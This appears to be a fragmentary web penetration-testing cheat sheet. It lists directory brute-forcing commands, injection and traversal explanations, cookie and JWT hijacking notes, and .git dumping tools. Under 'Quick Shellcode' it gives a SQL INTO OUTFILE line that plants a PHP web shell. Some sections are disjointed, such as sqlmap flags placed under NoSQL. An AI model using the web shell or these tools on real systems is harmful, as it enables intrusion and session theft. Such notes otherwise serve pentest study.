Some ressources are accessible by the attacker but not referenced by the web application. Discovery tool bruteforce url or domain with wordlist to discover new content.
gobuster dir -u <url> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 25 -x html,php
Feroxbuster
(Best one)
feroxbuster -u <url> -e -x html,js,php
Dirb
dirb url -R
GUI
dirbuster
owasp-zap
Nosql Injection
NoSQL databases (aka "not only SQL") are non-tabular databases and store data differently than relational tables. The syntax is different from traditional SQL syntax. Example: Mongo
-o Turn on all optimization switches
--predict-output Predict common queries output
--keep-alive Use persistent HTTP(s) connections
--null-connection Retrieve page length without actual HTTP response body
--threads=THREADS Max number of concurrent HTTP(s) requests (default 1)
--time-sec=TIMESEC Seconds to delay the DBMS response (default 5)
A path traversal attack aims to access files and directories that are stored outside the web root folder by manipulating variables that reference files. It may be possible to access arbitrary files and directories including application source code or configuration and critical system files.
pip3 install pymupdf
python3 script/get-pdf-annot.py -f "<HTTP(S)_URL> OR <PDF_PATH>"
Cookies
Cookies can be hijack by different way. Sign cookies can be decode to find vulnerable informations or bruteforce to find secret in order to create your own cookies. Other type of cookies need to be steal to hijack session.
Flask
Flask cookies are sign cookie so you can decode it or bruteforce the secret.
A JWT comes in this structure: AAAAAA.BBBBBB.CCCCCC. AAAAAA represents the header, BBBBBB represents the payload while CCCCCC represents the signature.
curl -X POST https://example.com/api/submit -H "Content-Type: application/json" -sd '{"email":"lol@lol.com"}'
Python
import requests
# GET
requests.get('http://example.com')
# POST
requests.post('http://example.com/submit',
headers={
'Content-type': 'raw',
},
data={'user': 'guest'},
)
Javascript
// GET
fetch('http://example.com/',{
method: 'GET',
})
// POST
fetch('http://example.com/',{
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify({data: 'lol'})
})
Download .git
githacker --url http://url/.git/ --folder result
git-dumper http://url .
CMS
Scaning
wpscan --force update -e --url IP --disable-tls-checks
Certificate
curl <url> --key KEY.key --cert CERT.cert
PhpMyAdmin
Quick Shellcode
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/dir/dir/file.php"
SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. -
Interesting of Port Swigger.
Template engines are widely used by web applications to present dynamic data via web pages and emails. Unsafely embedding user input in templates enables Server-Side Template Injection. Template Injection can be used to directly attack web servers' internals and often obtain Remote Code Execution (RCE).
XML external entity (XXE) injection is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access. -
XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.
Server XSS occurs when untrusted user supplied data is included in an HTTP response generated by the server. In this case, the entire vulnerability is in server-side code, and the browser is simply rendering the response and executing any valid script embedded in it.
